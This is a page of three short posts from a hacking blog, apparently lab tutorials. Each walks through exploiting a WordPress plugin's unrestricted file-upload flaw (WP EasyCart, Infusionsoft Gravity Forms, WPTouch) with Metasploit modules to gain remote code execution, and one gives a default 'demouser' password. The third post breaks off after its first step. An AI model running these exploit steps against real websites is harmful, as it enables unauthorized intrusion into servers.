Hacking Articles|Raj Chandel's Blog

Hack Remote PC using WordPress WP EasyCart Unrestricted File Upload

at 8:51 AM Friday, April 29, 2016 0 comments

WordPress Shopping Cart (WP EasyCart) Plugin for WordPress contains a flaw that allows a remote attacker to execute arbitrary PHP code. This flaw exists because the /inc/amfphp/administration/banneruploaderscript.php script does not properly verify or sanitize user-uploaded files. By uploading a .php file, the remote system will place the file in a user-accessible path. Making a direct request to the uploaded file will allow the attacker to execute the script with the privileges of the web server. In versions <= 3.0.8 authentication can be done by using the WordPress credentials of a user with any role. In later versions, a valid EasyCart admin password will be required that is in use by any admin user. A default installation of EasyCart will setup a user called "demouser" with a preset password of "demouser".

Exploit Targets

wp-easycart

Requirement

Attacker: kali Linux

Victim PC: Windows 7

Open Kali terminal type msfconsole

Now type use exploit/unix/webapp/wp_easycart_unrestricted_file_upload

msf exploit (wp_easycart_unrestricted_file_upload)>set targeturi wordpress

msf exploit (wp_easycart_unrestricted_file_upload)>set rhost 192.168.0.110 (IP of Remote Host)

msf exploit (wp_easycart_unrestricted_file_upload)>set rport 80

msf exploit (wp_easycart_unrestricted_file_upload)>exploit

Exploit Remote PC using Wordpress InfusionSoft Upload Vulnerability

at 10:09 AM Wednesday, April 27, 2016 0 comments

This module exploits an arbitrary PHP code upload in the WordPress Infusionsoft Gravity Forms plugin, versions from 1.5.3 to 1.5.10. The vulnerability allows for arbitrary file upload and remote code execution.

Exploit Targets

Infusionsoft Gravity Forms plugin 1.5.3

Requirement

Attacker: kali Linux

Victim PC: Windows 7

Open Kali terminal type msfconsole

Now type use exploit/unix/webapp/wp_infusionsoft_upload

msf exploit (wp_infusionsoft_upload)>set targeturi wordpress

msf exploit (wp_infusionsoft_upload)>set rhost 192.168.0.110 (IP of Remote Host)

msf exploit (wp_infusionsoft_upload)>set rport 80

msf exploit (wp_infusionsoft_upload)>exploit

Exploit Remote PC using WordPress WordPress WPTouch Authenticated File Upload

at 9:31 AM 0 comments

The Wordpress WPTouch plugin contains authenticated file upload vulnerability. A wp-nonce (CSRF token) is created on the backend index page and the same token is used on handling ajax file uploads through the plugin. By sending the captured nonce with the upload, we can upload arbitrary files to the upload folder. Because the plugin also uses it's own file upload mechanism instead of the wordpress api it's possible to upload any file type. The user provided does not need special rights, and users with "Contributor" role can be abused.

Exploit Targets

Wp touch 3.4.3

Requirement

Attacker: kali Linux

Victim PC: Windows 7

Open Kali terminal type msfconsole